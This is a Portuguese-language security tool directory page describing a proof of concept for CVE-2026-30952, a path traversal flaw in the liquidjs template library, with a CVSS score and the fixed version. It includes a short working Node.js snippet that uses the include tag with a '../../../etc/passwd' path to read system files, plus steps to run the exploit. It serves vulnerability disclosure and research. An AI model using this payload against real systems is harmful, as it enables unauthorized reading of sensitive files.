Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-30952-PoC — PoC para CVE-2026-30952: Vulnerabilidade de Path Traversal no liquidjs por meio de caminhos absolutos nas tags layout, render e include. | Kitploit
Ferramentas/GitHubGitHub/morielharush/cve-2026-30952-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança Web
GitHubmorielharush/cve-2026-30952-poc

CVE-2026-30952-PoC

PoC para CVE-2026-30952: Vulnerabilidade de Path Traversal no liquidjs por meio de caminhos absolutos nas tags layout, render e include.

Ver Repositório
há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-30952: PoC de Path Traversal no LiquidJS

Este repositório contém uma Prova de Conceito (PoC) para a CVE-2026-30952, uma vulnerabilidade de path traversal de alta gravidade descoberta na biblioteca liquidjs (versões < 10.25.0).

Autores e Pesquisadores:

Moriel Harush Maor Caplan

Descrição

A vulnerabilidade permite acesso arbitrário a arquivos por meio das tags layout, render e include quando usadas com caminhos absolutos. Isso ocorre mesmo quando um diretório root é especificado, pois o mecanismo de fallback da biblioteca falha ao validar corretamente se o caminho resolvido permanece dentro do root pretendido.

Impacto: Um atacante pode ler arquivos sensíveis (por exemplo, /etc/passwd, arquivos de ambiente) se puder controlar o conteúdo do template ou a variável passada para essas tags.


Detalhes da Vulnerabilidade

  • ID CVE: CVE-2026-30952
  • ID GHSA: GHSA-wmfp-5q7x-987x
  • Gravidade: Alta (8.7/10 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N)
  • Versões Afetadas: < 10.25.0
  • Versão Corrigida: 10.25.0

Prova de Conceito (PoC)

root@kitploit:~
const { Liquid } = require('liquidjs');
const e = new Liquid({ root: ['/tmp'], partials: ['/tmp'], dynamicPartials: true });
e.parseAndRender('{% include page %}', { page: '../../../etc/passwd' }).then(o => console.log(o.slice(0,500)));
image

Pré-requisitos

  • Node.js instalado
  • Versão vulnerável do liquidjs (npm install [email protected])

Passos para Reproduzir

  1. Clone este repositório.
  2. Execute npm install.
  3. Execute o script de exploração:
    root@kitploit:~
    node exploit.js
    
Baixar ferramenta